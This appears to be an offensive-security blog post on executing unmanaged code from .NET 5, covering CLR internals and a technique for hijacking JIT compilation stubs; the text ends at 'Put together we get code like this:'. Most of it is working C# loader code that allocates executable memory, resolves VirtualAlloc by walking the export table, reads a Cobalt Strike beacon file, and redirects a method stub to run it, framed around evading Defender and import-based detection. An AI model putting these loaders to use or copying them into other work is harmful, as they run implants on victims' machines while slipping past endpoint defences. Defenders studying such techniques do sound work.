Weird Ways to Run Unmanaged Code in .NET

Ever since the release of the .NET framework, the offensive security industry has spent a considerable amount of time crafting .NET projects to accommodate unmanaged code. Usually this comes in the form of a loader, wrapping payloads like Cobalt Strike beacon and invoking executable memory using a few P/Invoke imports. But with endless samples being studied by defenders, the process of simply dllimport’ing Win32 APIs has become more of a challenge, giving rise to alternate techniques such as D/Invoke.

Recently I have been looking at the .NET Common Language Runtime (CLR) internals and wanted to understand what further techniques may be available for executing unmanaged code from the managed runtime. This post contains a snippet of some of the weird techniques that I found.

The samples in this post will focus on .NET 5.0 executing x64 binaries on Windows. The decision by Microsoft to unify .NET means that moving forwards we are going to be working with a single framework rather than the current fragmented set of versions we’ve been used to. That being said, all of the areas discussed can be applied to earlier versions of the .NET framework, other architectures and operating systems… let’s get started.

A Quick History Lesson

What are we typically trying to achieve when executing unmanaged code in .NET? Often for us as Red Teamers, we are looking to do something like running a raw beacon payload, where native code is executed from within a C# wrapper.

For a long time, the most common way of doing this looked something like:

[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, int dwSize, uint flAllocationType, uint flProtect);

[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, out uint lpThreadId);

[DllImport("kernel32.dll")]
public static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

public static void StartShellcode(byte[] shellcode)
{
    uint threadId;

    IntPtr alloc = VirtualAlloc(IntPtr.Zero, shellcode.Length, (uint)(AllocationType.Commit | AllocationType.Reserve), (uint)MemoryProtection.ExecuteReadWrite);
    if (alloc == IntPtr.Zero) {
        return;
    }

    Marshal.Copy(shellcode, 0, alloc, shellcode.Length);
    IntPtr threadHandle = CreateThread(IntPtr.Zero, 0, alloc, IntPtr.Zero, 0, out threadId);
    WaitForSingleObject(threadHandle, 0xFFFFFFFF);
}

And all was fine. However, it did not take long before defenders realised that a .NET binary referencing a bunch of suspicious methods was a good indicator that the binary warranted further investigation.

And as an example of the obvious indicators that these imported methods yield, you will see that if you try and compile the above example on a machine protected by Defender, Microsoft will pop up a nice warning that you’ve just infected yourself with VirTool:MSIL/Viemlod.gen!A.
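
To get a feel for how visible these imports are, here is a minimal sketch that lists every method in an assembly carrying the P/Invoke flag, using nothing but reflection. The ImportAudit class and its ListPInvokes helper are names I've made up for illustration, and the GetCurrentProcessId import exists only so that the sample assembly has something to find. Real tooling would more likely parse the metadata tables directly, so treat this as an approximation of the idea rather than how any particular product works.

```csharp
using System;
using System.Collections.Generic;
using System.Reflection;
using System.Runtime.InteropServices;

public static class ImportAudit
{
    // Declared only so the assembly carries a P/Invoke record; it is never called.
    [DllImport("kernel32.dll")]
    private static extern uint GetCurrentProcessId();

    // Returns "Type::Method" for every method flagged as a P/Invoke in the assembly.
    public static List<string> ListPInvokes(Assembly assembly)
    {
        const BindingFlags all = BindingFlags.Public | BindingFlags.NonPublic |
                                 BindingFlags.Static | BindingFlags.Instance |
                                 BindingFlags.DeclaredOnly;
        var found = new List<string>();

        foreach (Type type in assembly.GetTypes())
        {
            foreach (MethodInfo method in type.GetMethods(all))
            {
                // PinvokeImpl is set on methods implemented via platform invoke
                if ((method.Attributes & MethodAttributes.PinvokeImpl) != 0)
                {
                    found.Add(type.FullName + "::" + method.Name);
                }
            }
        }

        return found;
    }
}
```

Calling ImportAudit.ListPInvokes(typeof(ImportAudit).Assembly) should surface the import without the method ever being invoked, which is roughly why static imports make such a convenient signature.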

So with these detections throwing a spanner in the works, techniques of course evolved. One such evolution of unmanaged code execution came from the awesome research completed by @fuzzysec and @TheRealWover, who introduced the D/Invoke technique. If we exclude the project's DLL loader for the moment, the underlying technique used by D/Invoke to transition from managed to unmanaged code is facilitated by a crucial method, Marshal.GetDelegateForFunctionPointer. If we look at the documentation, Microsoft tells us that this method “Converts an unmanaged function pointer to a delegate”. This gets around the fundamental problem of exposing those nasty imports, forcing defenders to go beyond the ImplMap table. A simple example of how we might use Marshal.GetDelegateForFunctionPointer to execute unmanaged code within an x64 process would be:

[UnmanagedFunctionPointer(CallingConvention.Winapi)]
public delegate IntPtr VirtualAllocDelegate(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

[UnmanagedFunctionPointer(CallingConvention.Winapi)]
public delegate IntPtr ShellcodeDelegate();

public static IntPtr GetExportAddress(IntPtr baseAddr, string name)
{
    var dosHeader = Marshal.PtrToStructure<IMAGE_DOS_HEADER>(baseAddr);
    var peHeader = Marshal.PtrToStructure<IMAGE_OPTIONAL_HEADER64>(baseAddr + dosHeader.e_lfanew + 4 + Marshal.SizeOf<IMAGE_FILE_HEADER>());
    var exportHeader = Marshal.PtrToStructure<IMAGE_EXPORT_DIRECTORY>(baseAddr + (int)peHeader.ExportTable.VirtualAddress);

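    for (int i = 0; i < exportHeader.NumberOfNames; i++)
    {
        var nameAddr = Marshal.ReadInt32(baseAddr + (int)exportHeader.AddressOfNames + (i * 4));
        var m = Marshal.PtrToStringAnsi(baseAddr + nameAddr);
        if (m == name)
        {
            // A name index maps to a function index via the ordinal table
            // (assumes the struct exposes AddressOfNameOrdinals, as in winnt.h)
            var ordinal = (ushort)Marshal.ReadInt16(baseAddr + (int)exportHeader.AddressOfNameOrdinals + (i * 2));
            var exportAddr = Marshal.ReadInt32(baseAddr + (int)exportHeader.AddressOfFunctions + (ordinal * 4));
            return baseAddr + exportAddr;
        }
    }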

    return IntPtr.Zero;
}

public static void StartShellcodeViaDelegate(byte[] shellcode)
{
    IntPtr virtualAllocAddr = IntPtr.Zero;

    foreach (ProcessModule module in Process.GetCurrentProcess().Modules)
    {
        if (string.Equals(module.ModuleName, "kernel32.dll", StringComparison.OrdinalIgnoreCase))
        {
            virtualAllocAddr = GetExportAddress(module.BaseAddress, "VirtualAlloc");
            break;
        }
    }

    // Bail out if the export could not be resolved
    if (virtualAllocAddr == IntPtr.Zero)
    {
        return;
    }

    var VirtualAlloc = Marshal.GetDelegateForFunctionPointer<VirtualAllocDelegate>(virtualAllocAddr);
    var execMem = VirtualAlloc(IntPtr.Zero, (uint)shellcode.Length, (uint)(AllocationType.Commit | AllocationType.Reserve), (uint)MemoryProtection.ExecuteReadWrite);
    if (execMem == IntPtr.Zero)
    {
        return;
    }

    Marshal.Copy(shellcode, 0, execMem, shellcode.Length);

    var shellcodeCall = Marshal.GetDelegateForFunctionPointer<ShellcodeDelegate>(execMem);
    shellcodeCall();
}
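
If you want to see the delegate transition on its own without any payload in the mix, the following is a small sketch that resolves a harmless export and calls it. Note that I've swapped the manual export walk for NativeLibrary.Load and NativeLibrary.GetExport purely to keep the sample short; the DelegateDemo class and QueryProcessId helper are illustrative names of my own, and the OperatingSystem.IsWindows check assumes .NET 5 or later.

```csharp
using System;
using System.Runtime.InteropServices;

public static class DelegateDemo
{
    [UnmanagedFunctionPointer(CallingConvention.Winapi)]
    private delegate uint GetCurrentProcessIdDelegate();

    // Resolves kernel32!GetCurrentProcessId at runtime and calls it through a delegate.
    // Returns null on non-Windows platforms, where kernel32.dll is not available.
    public static uint? QueryProcessId()
    {
        if (!OperatingSystem.IsWindows())
        {
            return null;
        }

        IntPtr module = NativeLibrary.Load("kernel32.dll");
        IntPtr address = NativeLibrary.GetExport(module, "GetCurrentProcessId");

        // No DllImport record exists for this call; only a raw function pointer
        var getPid = Marshal.GetDelegateForFunctionPointer<GetCurrentProcessIdDelegate>(address);
        return getPid();
    }
}
```

On Windows the returned value should match Environment.ProcessId, which makes it an easy way to confirm that the delegate signature and calling convention line up before pointing the same pattern at anything more interesting.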

So, with these methods out in the wild, are there any other techniques that we have available to us?

Targeting What We Cannot See

One of the areas hidden from casual .NET developers is the underlying CLR itself. Thankfully, Microsoft releases the source code for the CLR on GitHub, giving us a peek into how this beast actually operates.

Let’s start by looking at a very simple application:

using System;
using System.Runtime.InteropServices;

namespace Test
{
    public class Test
    {
        public static void Main(string[] args)
        {
            var testObject = "XPN TEST";
            GCHandle handle = GCHandle.Alloc(testObject);
            IntPtr parameter = (IntPtr)handle;
            Console.WriteLine("testObject at addr: {0}", parameter);
            Console.ReadLine();
        }
    }
}

Once we have this compiled, we can attach WinDBG to gather some information on the internals of the CLR during execution. We’ll start with the pointer outputted by this program and use the !dumpobj command provided by the SOS extension to reveal some information on what the memory address references:

As expected, we see that this memory points to a System.String .NET object, and we find the addresses of various associated fields available to us. The first class that we are going to look at is MethodTable, which represents a .NET class or interface to the CLR. We can inspect this further with a WinDBG helper method of !dumpmt [ADDRESS]:

We can also dump a list of methods associated with the System.String .NET class with !dumpmt -md [ADDRESS]:

So how are the System.String .NET methods found relative to a MethodTable? Well according to what has become a bit of a bible of .NET internals for me, we need to study the EEClass class. We can do this using dt coreclr!EEClass [ADDRESS]:

Again, we see several fields, but of interest to identifying associated .NET methods is the m_pChunks field, which references a MethodDescChunk object consisting of a simple structure:

Appended to a MethodDescChunk object is an array of MethodDesc objects, which represent .NET methods exposed by the .NET class (in our case System.String). Each MethodDesc is aligned to 18 bytes when running within an x64 process:

To retrieve information on this method, we can pass the address over to the !dumpmd helper command which tells us that the first .NET method of our System.String is System.String.Replace:

Now before we continue, it’s worth giving a quick insight into how the JIT compilation process works when executing a method from .NET. As I’ve discussed in previous posts, the JIT process is “lazy” in that a method won’t be JIT’ed up front (with some exceptions which we won’t cover here). Instead compilation is deferred to first use, by directing execution via the coreclr!PrecodeFixupThunk method, which acts as a trampoline to compile the method:

Once a method is executed, the native code is JIT’ed and this trampoline is replaced with a JMP to the actual compiled code.

So how do we find the pointer to this trampoline? Well, usually this pointer would live in a slot, which is located within a vector following the MethodTable, and which is indexed by the m_wSlotNumber of the MethodDesc object. But in some cases, this pointer immediately follows the MethodDesc object itself, as a so-called “Local Slot”. We can tell if this is the case by looking at the m_wFlags member of the MethodDesc object for a method, and seeing if the following flag has been set:
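
As a rough sketch of that check in C#: to the best of my knowledge the flag appears in the CoreCLR sources as mdcHasNonVtableSlot with a value of 0x0008, but treat both the name and the value as assumptions to verify against the runtime version you are targeting. The MethodDescFlags class and HasLocalSlot helper are illustrative names only.

```csharp
using System;

public static class MethodDescFlags
{
    // Assumption: value of mdcHasNonVtableSlot in the CoreCLR sources for .NET 5
    public const ushort HasNonVtableSlot = 0x0008;

    // True when the m_wFlags value indicates the slot follows the MethodDesc itself
    public static bool HasLocalSlot(ushort wFlags)
    {
        return (wFlags & HasNonVtableSlot) != 0;
    }
}
```

The m_wFlags value read from a MethodDesc can be passed straight in, which tells us whether to look for the pointer directly after the MethodDesc or in the vector following the MethodTable.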

If we dump the memory for our MethodDesc, we can see this pointer being located immediately after the object:

OK, with our knowledge of how the JIT process works and some idea of how the memory layout of a .NET method looks in unmanaged land, let’s see if we can use this to our advantage when looking to execute unmanaged code.

Hijacking JIT Compilation to Execute Unmanaged Code

To execute our unmanaged code, we need to gain control over the RIP register, which, now that we understand just how execution flows via the JIT process, should be relatively straightforward.

To do this we will define a few structures which will help us to follow along and demonstrate our POC code a little more clearly. Let’s start with a MethodTable:

[StructLayout(LayoutKind.Explicit)]
public struct MethodTable
{
    [FieldOffset(0)]
    public uint m_dwFlags;

    [FieldOffset(0x4)]
    public uint m_BaseSize;

    [FieldOffset(0x8)]
    public ushort m_wFlags2;

    [FieldOffset(0x0a)]
    public ushort m_wToken;

    [FieldOffset(0x0c)]
    public ushort m_wNumVirtuals;

    [FieldOffset(0x0e)]
    public ushort m_wNumInterfaces;

    [FieldOffset(0x10)]
    public IntPtr m_pParentMethodTable;

    [FieldOffset(0x18)]
    public IntPtr m_pLoaderModule;

    [FieldOffset(0x20)]
    public IntPtr m_pWriteableData;

    [FieldOffset(0x28)]
    public IntPtr m_pEEClass;

    [FieldOffset(0x30)]
    public IntPtr m_pPerInstInfo;

    [FieldOffset(0x38)]
    public IntPtr m_pInterfaceMap;
}

Then we will also require an EEClass:

[StructLayout(LayoutKind.Explicit)]
public struct EEClass
{
    [FieldOffset(0)]
    public IntPtr m_pGuidInfo;

    [FieldOffset(0x8)]
    public IntPtr m_rpOptionalFields;

    [FieldOffset(0x10)]
    public IntPtr m_pMethodTable;

    [FieldOffset(0x18)]
    public IntPtr m_pFieldDescList;

    [FieldOffset(0x20)]
    public IntPtr m_pChunks;
}

Next we need our MethodDescChunk:

[StructLayout(LayoutKind.Explicit)]
public struct MethodDescChunk
{
    [FieldOffset(0)]
    public IntPtr m_methodTable;

    [FieldOffset(8)]
    public IntPtr m_next;

    [FieldOffset(0x10)]
    public byte m_size;

    [FieldOffset(0x11)]
    public byte m_count;

    [FieldOffset(0x12)]
    public byte m_flagsAndTokenRange;
}

And finally a MethodDesc:

[StructLayout(LayoutKind.Explicit)]
public struct MethodDesc
{
    [FieldOffset(0)]
    public ushort m_wFlags3AndTokenRemainder;

    [FieldOffset(2)]
    public byte m_chunkIndex;

    [FieldOffset(0x3)]
    public byte m_bFlags2;

    [FieldOffset(0x4)]
    public ushort m_wSlotNumber;

    [FieldOffset(0x6)]
    public ushort m_wFlags;

    [FieldOffset(0x8)]
    public IntPtr TempEntry;
}

With each structure defined, we’ll work with the System.String type and populate each struct:

Type t = typeof(System.String);
var mt = Marshal.PtrToStructure<MethodTable>(t.TypeHandle.Value);
var ee = Marshal.PtrToStructure<EEClass>(mt.m_pEEClass);
var mdc = Marshal.PtrToStructure<MethodDescChunk>(ee.m_pChunks);
var md = Marshal.PtrToStructure<MethodDesc>(ee.m_pChunks + 0x18);

One snippet from above worth mentioning is t.TypeHandle.Value. Usefully for us, .NET provides us with a way to find the address of a MethodTable via the TypeHandle property of a type. This saves us some time hunting through memory when we are looking to target a .NET class such as the above System.String type.
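
A quick way to convince yourself that TypeHandle.Value really is the MethodTable address is to compare it against the first pointer-sized field of a live object. The sketch below assumes CoreCLR, where an object begins with its MethodTable pointer, and it relies on the pinned handle value carrying a marker in its lowest bit, which is an implementation detail rather than a documented contract. MethodTableDemo and ReadMethodTablePointer are illustrative names of my own.

```csharp
using System;
using System.Runtime.InteropServices;

public static class MethodTableDemo
{
    // Reads the first pointer-sized field of a pinned object, which on CoreCLR
    // is assumed to hold the address of the object's MethodTable.
    // Only works for objects that can be pinned (strings, blittable arrays, etc).
    public static IntPtr ReadMethodTablePointer(object target)
    {
        GCHandle handle = GCHandle.Alloc(target, GCHandleType.Pinned);
        try
        {
            // The handle value is the address of a slot holding the object reference.
            // Pinned handles are assumed to set the lowest bit, so mask it off first.
            long slot = GCHandle.ToIntPtr(handle).ToInt64() & ~1L;
            IntPtr objectAddress = Marshal.ReadIntPtr(new IntPtr(slot));
            return Marshal.ReadIntPtr(objectAddress);
        }
        finally
        {
            handle.Free();
        }
    }
}
```

Under those assumptions, MethodTableDemo.ReadMethodTablePointer("XPN TEST") and typeof(string).TypeHandle.Value should be the same address, matching what !dumpobj reports as the MethodTable for the string.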

Once we have the CLR structures for the System.String type, we can find our first .NET method pointer which as we saw above points to System.String.Replace:

// Located at MethodDescChunk_ptr + sizeof(MethodDescChunk) + sizeof(MethodDesc)
IntPtr stub = Marshal.ReadIntPtr(ee.m_pChunks + 0x18 + 0x8);

This gives us an IntPtr pointing to RWX protected memory, which we know is going to be executed once we invoke the System.String.Replace method for the first time, which will be when JIT compilation kicks in. Let’s see this in action by jmp'ing to some unmanaged code. We will of course use a Cobalt Strike beacon to demonstrate this:

byte[] shellcode = System.IO.File.ReadAllBytes("beacon.bin");
IntPtr mem = VirtualAlloc(IntPtr.Zero, shellcode.Length, (uint)(AllocationType.Commit | AllocationType.Reserve), (uint)MemoryProtection.ExecuteReadWrite);
if (mem == IntPtr.Zero) {
    return;
}

// Copy the payload into the freshly allocated executable memory
Marshal.Copy(shellcode, 0, mem, shellcode.Length);

// Once the stub has been redirected to mem, invoking the method runs our unmanaged code
"ANYSTRING".Replace("XPN","WAZ'ERE", true, null);

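The redirect itself is just a handful of bytes written over the stub. As a sketch of one common x64 encoding (mov rax, imm64 followed by jmp rax), and not necessarily the exact bytes used in the full listing, the helper below builds a 12-byte absolute jump. JumpStub and BuildAbsoluteJump are hypothetical names, and whether 12 bytes fit at the stub without disturbing adjacent entries is something to confirm in a debugger first.

```csharp
using System;
using System.Buffers.Binary;

public static class JumpStub
{
    // Encodes: mov rax, <target> ; jmp rax  (12 bytes on x64)
    public static byte[] BuildAbsoluteJump(long target)
    {
        var code = new byte[12];
        code[0] = 0x48;  // REX.W prefix
        code[1] = 0xB8;  // mov rax, imm64
        BinaryPrimitives.WriteInt64LittleEndian(code.AsSpan(2, 8), target);
        code[10] = 0xFF; // jmp rax
        code[11] = 0xE0;
        return code;
    }
}
```

The resulting array could then be written over the stub with something like Marshal.Copy(jump, 0, stub, jump.Length), where jump is built from mem.ToInt64().
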
Put together we get code like this: